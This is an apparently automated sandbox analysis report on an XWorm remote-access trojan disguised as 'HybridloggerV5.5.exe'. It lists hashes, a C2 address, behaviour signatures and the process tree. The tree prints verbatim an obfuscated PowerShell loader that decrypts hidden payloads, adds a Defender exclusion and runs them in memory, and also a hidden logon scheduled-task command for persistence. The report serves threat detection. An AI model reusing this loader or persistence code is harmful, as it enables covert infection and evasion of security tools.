Overview

overview

10

Static

static

3

HybridloggerV5.5.exe

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    08-11-2024 22:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    HybridloggerV5.5.exe

  • Size

    937KB

  • MD5

    c9314841cdbf8522e9ee925039d3bfb7

  • SHA1

    1b851459626862fdae6bdc0dd30aadf7a0f905ee

  • SHA256

    9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7

  • SHA512

    fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0

  • SSDEEP

    24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

C2

193.161.193.99:24469

Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 6 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 20 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe
    "C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4388
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:4820
        • C:\Windows\system32\findstr.exe
          findstr /C:"hello" banned_users.txt
          3⤵
            PID:3776
          • C:\Windows\system32\findstr.exe
            findstr /C:"hello hello" users.txt
            3⤵
              PID:2032
            • C:\Windows\system32\timeout.exe
              timeout /t 5
              3⤵
              • Delays execution with timeout.exe
              PID:4040
            • C:\Windows\system32\timeout.exe
              timeout /t 5
              3⤵
              • Delays execution with timeout.exe
              PID:4444
            • C:\Windows\system32\timeout.exe
              timeout /t 5
              3⤵
              • Delays execution with timeout.exe
              PID:4944
            • C:\Windows\system32\timeout.exe
              timeout /t 5
              3⤵
              • Delays execution with timeout.exe
              PID:5100
            • C:\Windows\system32\timeout.exe
              timeout /t 23
              3⤵
              • Delays execution with timeout.exe
              PID:456
            • C:\Windows\system32\timeout.exe
              timeout /t 5
              3⤵
              • Delays execution with timeout.exe
              PID:1036
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1504
            • C:\Windows\system32\net.exe
              net file
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4596
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                4⤵
                  PID:4280
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4816
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_27_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_27.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3680
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_27.vbs"
                  4⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:4124
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_27.bat" "
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2124
                    • C:\Windows\system32\net.exe
                      net file
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1764
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 file
                        7⤵
                          PID:4148
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_27.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                        6⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2240
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:3676
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                2⤵
                • Checks processor information in registry
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2448
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8f5b36c-ae9f-4850-bd20-71fd44f9f39d} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" gpu
                  3⤵
                    PID:2936
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2368 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2124bcf-23ea-47e0-9749-25071d8640f6} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" socket
                    3⤵
                      PID:4632
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3180 -childID 1 -isForBrowser -prefsHandle 3172 -prefMapHandle 3168 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95f3c159-8573-448b-acdb-dfa62bc60664} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
                      3⤵
                        PID:4296
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3012 -childID 2 -isForBrowser -prefsHandle 2992 -prefMapHandle 3148 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6595b86b-43a0-403e-89d2-12773f51b1f4} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
                        3⤵
                          PID:4012
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4616 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4596 -prefMapHandle 4536 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd001126-a925-4f55-846c-7099d36f1c68} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" utility
                          3⤵
                          • Checks processor information in registry
                          PID:5028
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 3 -isForBrowser -prefsHandle 5500 -prefMapHandle 5488 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0d284b2-cbe0-4bc9-947a-d24481fafba1} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
                          3⤵
                            PID:2032
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5668 -childID 4 -isForBrowser -prefsHandle 5624 -prefMapHandle 5524 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {47044437-6688-44f0-9b6b-d31f8564f51a} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
                            3⤵
                              PID:2764
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5928 -childID 5 -isForBrowser -prefsHandle 5848 -prefMapHandle 5856 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6862b3f7-1ca8-4b0d-8316-96a8e394ed3c} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
                              3⤵
                                PID:392
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6388 -childID 6 -isForBrowser -prefsHandle 6380 -prefMapHandle 6368 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e66b93c4-30b6-43dc-9460-73d1d70488cf} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
                                3⤵
                                  PID:4352

                            Network

                            MITRE ATT&CK Enterprise v15

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                              Filesize

                              3KB

                              MD5

                              3eb3833f769dd890afc295b977eab4b4

                              SHA1

                              e857649b037939602c72ad003e5d3698695f436f

                              SHA256

                              c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

                              SHA512

                              c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                              Filesize

                              1KB

                              MD5

                              01d91a150deec836b7c444d4cc323e7a

                              SHA1

                              8c70d9e38e927d6026d9a94b118b3ecef46a5f2d

                              SHA256

                              66f51c32062c44f88538dad2b4e50bc3aa932e0ec2b133ad3715fbc91b473862

                              SHA512

                              8816ec88e0a2706ea299db5afce10b288cd9894e5f54fc9afb3341dc5f05133b09fe51968c8389539fa8fa1534d3348756d2f2e2cf090d057a8f58e42c661637

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dly1kncb.default-release\activity-stream.discovery_stream.json
                              Filesize

                              22KB

                              MD5

                              9ab55a9df6a5cfe50fbb290d2fc57185

                              SHA1

                              d5262cea0c05aeea0f81fbcc06295c451c46b75a

                              SHA256

                              4a633d64505dfb55059d225b868c9f828fb1e5d58fa2621aa4d053c76ceb79b2

                              SHA512

                              d1116cdc3889da43252b9ef6e6300427ad41d42fee5142b028bc0279322a2e52e3b77a1aba84b5c985834586b9aa90cb5f02485734599ad10955ad7684b50f03

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat
                              Filesize

                              12KB

                              MD5

                              89a22d3791ca38666c8144725a74497d

                              SHA1

                              96b672089a3c783e4dd27e8da7c0cc1245d55cfd

                              SHA256

                              9326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94

                              SHA512

                              6b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat
                              Filesize

                              910KB

                              MD5

                              72ecd938d114e246eeebc8ae430fc2e9

                              SHA1

                              9ece59be22ceadcb3951093483cc69a76658801d

                              SHA256

                              4eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65

                              SHA512

                              d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4tszxz5.svk.ps1
                              Filesize

                              60B

                              MD5

                              d17fe0a3f47be24a6453e9ef58c94641

                              SHA1

                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                              SHA256

                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                              SHA512

                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              Download Submit

                            • C:\Users\Admin\AppData\Local\Temp\users.txt
                              Filesize

                              14B

                              MD5

                              352362ce38477524ee1206f2f40db10e

                              SHA1

                              42866310620b07a48b4e4be1819284d4a9b55922

                              SHA256

                              355f0bad0f1c510a745fcefe317d87134cb086a838a60b9d3d396cbcab7ad528

                              SHA512

                              5453ac998cbff1a8a3d6cd76239c7238eb9d16fee97bcd6e676d966a35f0886af8c2a4de3abbc3c50452306832525fea2b71767c6cdc626d27a73b61bed2a87e

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\AlternateServices.bin
                              Filesize

                              8KB

                              MD5

                              b9e309e63b51a225c01d3d26d82c17fe

                              SHA1

                              df3c6ed043e83433181d3b4ef90849e540ae6d10

                              SHA256

                              56138b0f2f0618e428f751f75c75196290e14485fe7aa3a5917b5e51e7aa2860

                              SHA512

                              82490296cc83bc5480bd43c31ef011c965478bd502ef5a84d71025cbb3a412e0f96e1907b37a07394abc758c355763d945dfd6bacde9efa4754638aa183d307c

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\datareporting\glean\db\data.safe.tmp
                              Filesize

                              5KB

                              MD5

                              6b2acda78483e1f6ab7b7f7a634e8b23

                              SHA1

                              62dfaef3ddc8bce88f5097139829855e6e593651

                              SHA256

                              e255063c1e4518525fad52a5642c5c72442da3654ec4e11e7cb5f34cd6ac2ab9

                              SHA512

                              227f6ccede371618027b51d8ffa1409b9b0849695a69594e33c2b7a8c1b713b9e5e829ac2989b0ed051934c6b222f402e879452059e2d089686b5c63fa174a43

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\datareporting\glean\db\data.safe.tmp
                              Filesize

                              5KB

                              MD5

                              79a672c3b6971fb38f5af8f672e1e024

                              SHA1

                              72e375cba1c62223eca1b85977c0f527be413a08

                              SHA256

                              16b1592ef63d1078c206171cb7b286a086eeaa1d0214749fd31d9c5ba8f5157c

                              SHA512

                              2f382df1d62e13622f0176f354fa47fec1872d095aa68405e1d48eb3f7e620073885db373f94a030401b22a9d263a9b143124bf883a1e0ec3018fdb5d1e160ee

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\datareporting\glean\pending_pings\5749c4ec-a8ac-4f76-9e76-32ac63701966
                              Filesize

                              26KB

                              MD5

                              022fb735d201cb20481e936a00f4403b

                              SHA1

                              429559b2f5bd4a8d5d7188679624afc0406b964a

                              SHA256

                              5327b986b083a7dd03811ee1e0df3dd434a5b55773b0c99aec363cf1d699629d

                              SHA512

                              a22248968ebfe6e36d38d9dce139f56e9bae31ce5e96bcc578dd11a05b60e81f21d7edb710e61457878d969c21ee3426b5d2e1681db256c14fd68d70267da8d7

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\datareporting\glean\pending_pings\77ec597a-0b75-4cfe-8b22-dc7594863c80
                              Filesize

                              671B

                              MD5

                              3ccba4590780cd032d6f09d427cc24e6

                              SHA1

                              970fb41d3b8bc1a5a11dc7b483ab24b1e2b0bd78

                              SHA256

                              cbea52de2129979c936439ed621830f7c4b6ed056b72864848211054ead8e899

                              SHA512

                              f92d643048730331bc30b5a3d928fdc8aa35c4caffda747148df28012e949641a7376c63dae4cfad465b4de3445e8b8ed31b225f9704795bb0424b7f33ee7e0d

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\datareporting\glean\pending_pings\8a4eda47-ed25-4100-a468-a83e365d86a7
                              Filesize

                              982B

                              MD5

                              1c8c9a5b21998bf0da463930e591ac7d

                              SHA1

                              f2b11791b3376cfa44bfb37ea7be10622e9f11f3

                              SHA256

                              64ca93829ff9d6d4724680620cac3259e39b3071093f020b7938c6a8dfc61b80

                              SHA512

                              2628254788eb1fbfa105d7247eef850f7db1c50fa8b3c47cf86446d6139d0b77ca33f94116ed05923f11b0391eee0bceaf799472910cbe346b229d1f6f9ed142

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\prefs.js
                              Filesize

                              10KB

                              MD5

                              2dfeda0169b249b32d72441da0530d12

                              SHA1

                              67c30f261e0aa4374e5272493ca13241f4908b3e

                              SHA256

                              24efc63fb301616d82048732a0a775fa80955342c4e748c88e47d65ccf66cd0c

                              SHA512

                              755e34ecf64d074743690c41a9854d10068f161b5aee4a40b3ab8c4712bff864f492028cf1b8231309b317d238e89042e8fc04a64d0b9161b971918bb24a116e

                              Download Submit

                            • C:\Users\Admin\AppData\Roaming\startup_str_27.vbs
                              Filesize

                              114B

                              MD5

                              7ada6acef03b0841d026cbe9c8c8e813

                              SHA1

                              884d750adb94936ef37a768489526d9761482137

                              SHA256

                              6d1b677af45e7613f0fea645c1195cdb514adcb948df6012f306563b6cf21a20

                              SHA512

                              d6c0333e2a092f1eaf124bfebb557d4613a377f7d692ac4e66183d62f4a77543c64af50bb5e35189324bd0c2928530de0d7bc63500e00bb0125ed100b9c9d844

                              Download Submit

                            • memory/2240-60-0x000002B14D110000-0x000002B14D126000-memory.dmp

                              Filesize

                              88KB

                              Download

                            • memory/3056-0-0x00007FF98C233000-0x00007FF98C235000-memory.dmp

                              Filesize

                              8KB

                              Download

                            • memory/3056-1-0x0000000000C70000-0x0000000000D60000-memory.dmp

                              Filesize

                              960KB

                              Download

                            • memory/4816-28-0x00000239B7DE0000-0x00000239B7E18000-memory.dmp

                              Filesize

                              224KB

                              Download

                            • memory/4816-27-0x00000239B7D90000-0x00000239B7D98000-memory.dmp

                              Filesize

                              32KB

                              Download

                            • memory/4816-22-0x00000239B7AC0000-0x00000239B7AE2000-memory.dmp

                              Filesize

                              136KB

                              Download